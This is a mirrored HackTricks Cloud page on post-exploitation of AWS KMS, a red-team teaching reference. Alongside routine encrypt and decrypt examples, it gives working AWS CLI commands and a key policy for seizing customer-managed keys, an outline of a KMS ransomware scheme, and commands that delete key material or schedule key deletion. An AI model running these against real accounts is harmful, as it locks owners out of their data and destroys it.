mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-29 14:13:20 -08:00
164 lines
6.7 KiB
Markdown
164 lines
6.7 KiB
Markdown
# AWS - KMS Post Exploitation
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
## KMS
|
|
|
|
For more information check:
|
|
|
|
{% content-ref url="../aws-services/aws-kms-enum.md" %}
|
|
[aws-kms-enum.md](../aws-services/aws-kms-enum.md)
|
|
{% endcontent-ref %}
|
|
|
|
### Encrypt/Decrypt information
|
|
|
|
`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files:
|
|
|
|
* `fileb://:` Reads the file in binary mode, commonly used for non-text files.
|
|
* `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements.
|
|
|
|
{% hint style="success" %}
|
|
Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://)
|
|
{% endhint %}
|
|
|
|
* Using a **symmetric** key
|
|
|
|
```bash
|
|
# Encrypt data
|
|
aws kms encrypt \
|
|
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
|
|
--plaintext fileb:///tmp/hello.txt \
|
|
--output text \
|
|
--query CiphertextBlob | base64 \
|
|
--decode > ExampleEncryptedFile
|
|
|
|
# Decrypt data
|
|
aws kms decrypt \
|
|
--ciphertext-blob fileb://ExampleEncryptedFile \
|
|
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
|
|
--output text \
|
|
--query Plaintext | base64 \
|
|
--decode
|
|
```
|
|
|
|
* Using a **asymmetric** key:
|
|
|
|
```bash
|
|
# Encrypt data
|
|
aws kms encrypt \
|
|
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
|
|
--encryption-algorithm RSAES_OAEP_SHA_256 \
|
|
--plaintext fileb:///tmp/hello.txt \
|
|
--output text \
|
|
--query CiphertextBlob | base64 \
|
|
--decode > ExampleEncryptedFile
|
|
|
|
# Decrypt data
|
|
aws kms decrypt \
|
|
--ciphertext-blob fileb://ExampleEncryptedFile \
|
|
--encryption-algorithm RSAES_OAEP_SHA_256 \
|
|
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
|
|
--output text \
|
|
--query Plaintext | base64 \
|
|
--decode
|
|
```
|
|
|
|
### KMS Ransomware
|
|
|
|
An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account.
|
|
|
|
Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account.
|
|
|
|
{% hint style="warning" %}
|
|
Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**.
|
|
|
|
Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI).
|
|
{% endhint %}
|
|
|
|
```bash
|
|
# Force policy change
|
|
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
|
|
--policy-name default \
|
|
--policy file:///tmp/policy.yaml \
|
|
--bypass-policy-lockout-safety-check
|
|
|
|
{
|
|
"Id": "key-consolepolicy-3",
|
|
"Version": "2012-10-17",
|
|
"Statement": [
|
|
{
|
|
"Sid": "Enable IAM User Permissions",
|
|
"Effect": "Allow",
|
|
"Principal": {
|
|
"AWS": "arn:aws:iam::<your_own_account>:root"
|
|
},
|
|
"Action": "kms:*",
|
|
"Resource": "*"
|
|
}
|
|
]
|
|
}
|
|
```
|
|
|
|
{% hint style="danger" %}
|
|
Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**.
|
|
{% endhint %}
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (77).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
### Generic KMS Ransomware
|
|
|
|
#### Global KMS Ransomware
|
|
|
|
There is another way to perform a global KMS Ransomware, which would involve the following steps:
|
|
|
|
* Create a new **key with a key material** imported by the attacker
|
|
* **Re-encrypt older data** encrypted with the previous version with the new one.
|
|
* **Delete the KMS key**
|
|
* Now only the attacker, who has the original key material could be able to decrypt the encrypted data
|
|
|
|
### Destroy keys
|
|
|
|
```bash
|
|
# Destoy they key material previously imported making the key useless
|
|
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab
|
|
|
|
# Schedule the destoy of a key (min wait time is 7 days)
|
|
aws kms schedule-key-deletion \
|
|
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
|
|
--pending-window-in-days 7
|
|
```
|
|
|
|
{% hint style="danger" %}
|
|
Note that AWS now **prevents the previous actions from being performed from a cross account:**
|
|
{% endhint %}
|
|
|
|
<figure><img src="../../../.gitbook/assets/image (76).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|